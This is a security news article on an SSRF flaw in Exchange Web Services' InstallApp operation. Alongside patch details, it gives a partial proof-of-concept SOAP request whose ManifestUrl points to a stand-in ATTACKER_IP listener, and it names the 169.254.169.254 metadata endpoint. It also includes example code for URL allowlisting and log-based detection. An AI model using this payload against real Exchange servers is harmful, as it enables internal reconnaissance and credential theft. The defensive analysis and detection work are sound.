TechTrendFeed
PoC Released for Microsoft Exchange Server EWS InstallApp SSRF Vulnerability

By Admin
June 24, 2026


A proof-of-concept exploit has been released for CVE-2026-45502, a server-side request forgery (SSRF) vulnerability in the InstallApp operation of Microsoft Exchange Server's Exchange Web Services (EWS). The vulnerability poses a risk to organisations that have not yet deployed the June 2026 security updates.

The flaw affects Exchange Server 2016 CU23, Exchange Server 2019 CU14 and CU15, and Exchange Server Subscription Edition RTM. An authenticated mailbox user can abuse the ManifestUrl parameter of an InstallApp SOAP call to force the server to send HTTP requests to attacker-controlled internal or external endpoints.

Microsoft Exchange Server SSRF Vulnerability

Microsoft rates the vulnerability at CVSS 3.1 5.0 (medium), based on a network attack vector, low attack complexity, low required privileges, no user interaction, a change in scope and limited confidentiality impact.

A more detailed CVSS 4.0 assessment assigns a score of 2.3 (low), while still acknowledging the proof-of-concept status and the potential real-world risk in sensitive network configurations, as reported by Aretiq.

The root cause is insufficient URL validation in the SynchronousDownloadData.DownloadDataFromUri() routine, which processes user-supplied ManifestUrl values during EWS add-in installation.

In on-premises Exchange deployments, the check for intranet-address SSRF depends on a cloud-specific isBposUser flag that is always set to false. As a result, the internal-address blocking logic never runs, and the server trusts arbitrary URLs supplied by authenticated users.

This logic error effectively turns Exchange into a network proxy that can reach internal HTTP services, metadata endpoints such as 169.254.169.254, and other restricted resources from the server's privileged network position.

Although the SSRF is largely blind, researchers have shown that response behaviour, HTTP error codes and timing can be used to map internal services and confirm their reachability, giving a reliable method for internal reconnaissance and potential chaining with other vulnerabilities.

To demonstrate exploitability, the researchers published a PoC workflow that starts a simple HTTP listener and then sends a crafted EWS InstallApp request whose ManifestUrl points back to that listener, confirming the SSRF when the Exchange server initiates the callback. A minimal pseudocode-style PoC fragment is shown below, with full automation omitted for safety and brevity:

# Minimal PoC sketch (for lab validation only)
soap_body = """

  
    
      http://ATTACKER_IP:8888/ssrf-test
    
  

"""
# Send the SOAP body to https://EXCHANGE/EWS/Exchange.asmx in an authenticated EWS request

In a vulnerable environment, the Exchange server performs an HTTP GET to the specified URL, typically appending a corr= correlation parameter.

By contrast, a patched system rejects the request before establishing any outbound connection. The existence of such a PoC, even in limited form, increases the likelihood of opportunistic probing and red-team adoption, especially in environments where Exchange servers have broad east-west visibility.

Microsoft addressed CVE-2026-45502 in the June 9, 2026 Patch Tuesday release via KB5094139 for Exchange Server Subscription Edition and corresponding security updates for Exchange 2016 and 2019.

The fix replaces the isBposUser-gated logic with a feature-flag-driven model that enforces ManifestUrlValidation for all deployments and introduces ManifestUrlCheck, an allowlist that by default permits only trusted authorities such as officeclient.microsoft.com, with optional administrator-configurable entries.
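The following is an added example, not Exchange's code or anything published by Microsoft or Aretiq. It models, in Python, the two validation shapes the article describes: the pre-patch decision, in which the internal-address check only runs when the cloud-only isBposUser flag is set (so on-premises every URL passes), and an allowlist check in the spirit of ManifestUrlCheck that accepts only trusted hostnames such as officeclient.microsoft.com. The function names, the tuple return value and the exact-match rule on the normalised hostname are assumptions; the article does not detail how Exchange matches allowlist entries.

```python
"""Manifest URL validation modelled on the flaw and the fix described above.

Added example, not Exchange's own code: both functions are illustrative
re-implementations of the described decision logic, not the .NET routines.
"""
import ipaddress
from urllib.parse import urlsplit

# Default allowlist entry named in the article; any further entries would be
# administrator-configured.
DEFAULT_ALLOWED_HOSTS = frozenset({"officeclient.microsoft.com"})


def _is_internal_address(host: str) -> bool:
    """True for 'localhost' or a literal IP in loopback, link-local or private space.

    Hostnames are not resolved here, so a DNS name that points at an internal
    address passes this check; that gap is one reason a denylist alone is weak.
    """
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False
    return ip.is_loopback or ip.is_link_local or ip.is_private


def legacy_manifest_url_allowed(url: str, is_bpos_user: bool) -> bool:
    """Pre-patch shape of the decision (assumed): the internal-address check is
    gated on the cloud-only flag. On-premises that flag is always False, so the
    check never runs and any URL with an http(s) scheme is accepted."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if is_bpos_user and _is_internal_address(parts.hostname):
        return False
    return True


def validate_manifest_url(url: str, allowed_hosts=DEFAULT_ALLOWED_HOSTS):
    """Allowlist validation in the spirit of ManifestUrlCheck.

    Returns (accepted, reason). Exact match on the normalised hostname is an
    assumption; Exchange's real matching rules are not given in the article.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme is not http(s)"
    # user:pass@host forms would let an allowlisted name sit in the userinfo part.
    if "@" in parts.netloc:
        return False, "userinfo is not allowed"
    host = parts.hostname  # urlsplit already lowercases the hostname
    if not host:
        return False, "missing host"
    host = host.rstrip(".")  # normalise the trailing-dot FQDN form
    try:
        ipaddress.ip_address(host.strip("[]"))
        return False, "IP literals are not allowed"
    except ValueError:
        pass
    allowed = {h.lower().rstrip(".") for h in allowed_hosts}
    if host not in allowed:
        return False, "host %s is not in the allowlist" % host
    return True, "allowed"


if __name__ == "__main__":
    for candidate in ("https://officeclient.microsoft.com/manifest.xml",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://ATTACKER_IP:8888/ssrf-test"):
        print(candidate, "legacy on-prem:", legacy_manifest_url_allowed(candidate, False),
              "allowlist:", validate_manifest_url(candidate))
```

Two design points matter beyond the check itself: the allowlist is applied to the hostname the code will actually connect to (not to a name hidden in userinfo or a trailing-dot variant), and the fetch that follows should still resolve the name once, pin the resolved address and refuse redirects, because an allowlisted hostname can otherwise be redirected or rebound to an internal address after validation.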

Organisations should verify that their Exchange builds meet or exceed the fixed versions documented in Microsoft's guidance and third-party advisories; any instance below those builds should be treated as vulnerable until patched.

In parallel, defenders are urged to restrict outbound connectivity from Exchange servers, monitor for anomalous HTTP traffic from Exchange to internal ranges or unusual external hosts, and apply strict access controls around EWS endpoints, given that valid credentials remain a prerequisite for exploitation.
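As an added example of the monitoring the paragraph above recommends (not a Microsoft or vendor detection rule), the script below scans egress-proxy log lines for HTTP requests that originate from an Exchange server and go to the cloud metadata endpoint, to RFC 1918 or link-local ranges, or to any host other than the expected manifest authority. The log format, the Exchange server inventory and the sample lines are constructed for this example; the corr= query parameter is treated only as supporting evidence, since the article reports Exchange appends it to its manifest fetches.

```python
"""Flag Exchange-originated HTTP requests to unexpected destinations.

Added example, not a vendor detection rule. The key=value log format, the
Exchange inventory and every sample line below are constructed.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed inventory (assumption): addresses of the on-prem Exchange servers.
EXCHANGE_SERVERS = {ipaddress.ip_address("10.1.2.10")}

# Hosts Exchange is expected to fetch add-in manifests from; the article names
# officeclient.microsoft.com as the default allowlisted authority.
EXPECTED_MANIFEST_HOSTS = {"officeclient.microsoft.com"}

METADATA_ENDPOINT = ipaddress.ip_address("169.254.169.254")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed egress-proxy log format: key=value fields with a quoted URL.
LOG_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) '
    r'method=(?P<method>\S+) url="(?P<url>[^"]*)"$')


def parse_line(line):
    """Return a dict of fields, or None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_internal(ip):
    """True when ip falls in a private, loopback or link-local range."""
    return any(ip in net for net in INTERNAL_NETS)


def assess(event):
    """Return the reasons an event is suspicious, or [] when it is not.

    Only traffic sourced from an Exchange server is considered. An alert needs a
    destination-based reason; the corr= marker is appended as supporting evidence.
    """
    try:
        src = ipaddress.ip_address(event["src"])
        dst = ipaddress.ip_address(event["dst"])
    except ValueError:
        return []
    if src not in EXCHANGE_SERVERS:
        return []
    reasons = []
    if dst == METADATA_ENDPOINT:
        reasons.append("cloud metadata endpoint")
    elif is_internal(dst):
        reasons.append("internal destination")
    parts = urlsplit(event["url"])
    host = (parts.hostname or "").rstrip(".")
    if host not in EXPECTED_MANIFEST_HOSTS:
        reasons.append("destination not an expected manifest host")
    if reasons and "corr" in parse_qs(parts.query):
        reasons.append("corr= parameter present (EWS download marker)")
    return reasons


def scan(lines):
    """Parse each line and return findings as (timestamp, url, reasons) tuples."""
    findings = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        reasons = assess(event)
        if reasons:
            findings.append((event["ts"], event["url"], reasons))
    return findings


# Constructed sample log: one benign manifest fetch, three SSRF-like fetches from
# the Exchange server, one request from a non-Exchange host and one malformed line.
SAMPLE_LOG = """\
2026-06-24T10:15:02Z src=10.1.2.10 dst=203.0.113.10 dport=443 method=GET url="https://officeclient.microsoft.com/manifest.xml?corr=7c1d"
2026-06-24T10:15:09Z src=10.1.2.10 dst=169.254.169.254 dport=80 method=GET url="http://169.254.169.254/latest/meta-data/?corr=9a2f"
2026-06-24T10:15:11Z src=10.1.2.10 dst=10.1.5.20 dport=8080 method=GET url="http://10.1.5.20:8080/?corr=b3e1"
2026-06-24T10:15:13Z src=10.1.7.44 dst=10.1.5.20 dport=8080 method=GET url="http://10.1.5.20:8080/"
2026-06-24T10:15:20Z src=10.1.2.10 dst=203.0.113.77 dport=8888 method=GET url="http://203.0.113.77:8888/ssrf-test?corr=0f11"
garbage line that does not parse
""".splitlines()

if __name__ == "__main__":
    for ts, url, reasons in scan(SAMPLE_LOG):
        print(ts, url, "; ".join(reasons))
```

Keying the rule on the source being an Exchange server is what keeps it quiet: ordinary clients reach internal web services all the time, but an Exchange server should only be fetching add-in manifests from a short list of authorities, so anything else from that source, and especially a hit on 169.254.169.254, is worth an investigation rather than a threshold.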
